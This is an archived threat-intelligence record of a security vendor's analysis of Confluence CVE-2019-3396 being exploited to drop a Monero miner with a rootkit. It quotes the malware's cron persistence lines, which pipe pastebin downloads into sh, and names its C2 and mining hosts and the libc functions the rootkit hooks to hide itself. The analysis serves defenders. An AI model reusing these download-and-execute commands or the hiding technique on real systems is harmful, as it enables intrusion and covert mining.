{
	"id": "2e8b4542-57a2-43da-b98e-f815473830f4",
	"created_at": "2026-04-06T00:12:53.131256Z",
	"updated_at": "2026-04-10T13:12:17.238271Z",
	"deleted_at": null,
	"sha1_hash": "3e18f65597ac9fb99c1fd9e56a9728f97f94111a",
	"title": "CVE-2019-3396: Exploiting the Confluence Vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 88588,
	"plain_text": "CVE-2019-3396: Exploiting the Confluence Vulnerability\r\nBy: Augusto Remillano II, Robert Malagad. May 07, 2019. Read time: 3 min (854 words)\r\nPublished: 2019-05-07 · Archived: 2026-04-05 19:01:56 UTC\r\nIn March 2019, Atlassian published an advisory covering two critical vulnerabilities involving Confluence, a widely used collaboration and planning software. In April, we observed one of these vulnerabilities, the widget connector vulnerability CVE-2019-3396, being exploited by threat actors to perform malicious attacks. Security provider Alert Logic also discovered the vulnerability being exploited to drop the Gandcrab ransomware.\r\nIt seems that these incidents are not the last we’ve seen of the CVE-2019-3396 exploitation, as threat actors are still finding new ways to exploit the vulnerability. We discovered that it is also being used to deliver a cryptocurrency-mining malware containing a rootkit that was designed to hide its activities. This technique is highly reminiscent of another attack that occurred in November 2018 and used a similar miner-rootkit combination.\r\nArrival and propagation\r\nFigure 1. Infection chain\r\nThe attack begins with a remote command sent to download a shell script from pastebin (hxxps://pastebin[.]com/MjGrx7EA).\r\nThis shell script kills certain processes and then downloads and executes “lsd_1” from another pastebin (hxxps://pastebin[.]com/CvJM3qz5). This file is a second shell script that will drop a third shell script, “lsd_2,” sourced from yet another pastebin (hxxps://pastebin[.]com/a3EAddwq).\r\nThis shell script is responsible for downloading a trojan dropper from the following servers:\r\ngwjyhs[.]com\r\nimg[.]sobot[.]com\r\nThe malware, kerberods (detected as Trojan.Linux.KERBERDS.A), is a custom-packed binary that installs itself via cron jobs:\r\n*/10 * * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/15 * * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/10 * * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/15 * * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O- hxxps://pastebin[.]com/raw/rPB8eDpu)|sh\r\nKerberods is responsible for dropping the cryptocurrency miner (khugepageds, detected as Coinminer.Linux.MALXMR.UWEJI) and its rootkit component.\r\nOne particularly interesting aspect of the binary is the way it drops the rootkit. First, it writes the code for the rootkit to a file named /usr/local/lib/{random filename}.c.\r\nFigure 2. Writing the rootkit code\r\nThe rootkit is then compiled via gcc, with the output binary being /usr/local/lib/{random filename}.so.\r\nFigure 3. Compiling the rootkit code\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/\r\nKerberods also has multiple ways of propagating itself, spreading via SSH and exploiting CVE-2019-1003001 and CVE-2019-1003000.\r\nAs for khugepageds, it is an XMRig 2.14.1-mo1 Monero miner with a config that is hardcoded into the binary:\r\nFigure 4. The miner’s config\r\nThe mining pool can be accessed at systemten[.]org:51640.\r\nRootkit as evasion method\r\nAs mentioned earlier, this attack shares many of the same characteristics of last year’s incident, such as the use of pastebin as a C\u0026C server, the miner payload, and its use of a rootkit to hide the malware.\r\nLike kerberods, the miner payload also uses a custom packer to impede analysis.\r\nFigure 5. The custom packer used for the cryptocurrency-mining malware\r\nUnlike the older rootkit, which only hooks the readdir function to hide the mining process, this new version hooks more functions. It hides not only the mining process but also certain files and network traffic. It is also capable of forging the machine’s CPU usage.\r\nThe hooked functions are shown below:\r\nfopen\r\nfopen64\r\nlstat\r\nlxstat\r\nopen\r\nrmdir\r\nstat\r\nstat64\r\n__xstat\r\n__xstat64\r\nunlink\r\nunlinkat\r\nopendir\r\nreaddir\r\nreaddir6\r\nMost of the hooked functions return a “No such file or directory” error if their parameter contains the file name of the rootkit, the miner, or ld.so.preload.\r\nFigure 6. Hooked functions returning an error to hide the infection\r\nThe following image shows the htop system monitor output with and without the rootkit loaded. Note how the version with the rootkit loaded hides the CPU usage and the mining process.\r\nFigure 7. Comparison of the htop system monitor output showing the version with (right) and without (left) the rootkit present\r\nFigure 8. Netstat output before (left) and after (right) the rootkit is loaded\r\nFigure 9. Functions for forging CPU usage and TCP connections\r\nFigure 10. Forging network traffic\r\nFigure 11. Forging CPU usage\r\nThe rootkit also serves as a form of persistence by hooking the access function so that a cron job is created to reinstall the malware whenever it is called.\r\nFigure 12. Code showing the cron job used to download and execute kerberods\r\nSecurity recommendations and solutions\r\nWe’ve seen multiple attacks involving CVE-2019-3396 within a short span of time. This shows that cybercriminals are willing and able to abuse any vulnerability in multiple ways. This emphasizes that continuous monitoring is needed to detect any threats in an organization’s environment.\r\nFor effective monitoring, organizations can look into the Trend Micro™ Hybrid Cloud Security solution, which provides powerful, streamlined, and automated security within the DevOps pipeline. It also provides multiple XGen™ threat defense techniques for protecting physical, virtual, and cloud workloads. In addition, it protects containers via the Deep Security™ and Deep Security Smart Check solutions, which help DevOps and security teams scan and ensure the security of container images during preruntime and runtime.\r\nThe Trend Micro Deep Security solution protects user systems from threats that may target the following vulnerability rule:\r\n1009705 - Atlassian Confluence Server Remote Code Execution Vulnerability (CVE-2019-3396)\r\nIndicators of Compromise (IoCs)\r\nEach entry lists the component, its SHA-256 hash, and the detection name:\r\nkerberods (coinminer binary): a9228b6a3fe0b8375d6b881626fd4b59fbbf54dbd60a94b085ee0455b3d18fe9 (Trojan.Linux.KERBERDS.A)\r\nkhugepageds (cryptocurrency mining malware): 25064a5ab78cdd36e7049d00b9319222906dd634908c1858e2262bf333631213 (Coinminer.Linux.MALXMR.UW)\r\nrandom.so (rootkit): 3392589c9ebbf7600035574e338d69625cd5ce83ee655582fe8bbadb663532b3 (Rootkit.Linux.KERBERDS.A)\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/"
	],
	"report_names": [
		"cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434373,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e18f65597ac9fb99c1fd9e56a9728f97f94111a.pdf",
		"text": "https://archive.orkl.eu/3e18f65597ac9fb99c1fd9e56a9728f97f94111a.txt",
		"img": "https://archive.orkl.eu/3e18f65597ac9fb99c1fd9e56a9728f97f94111a.jpg"
	}
}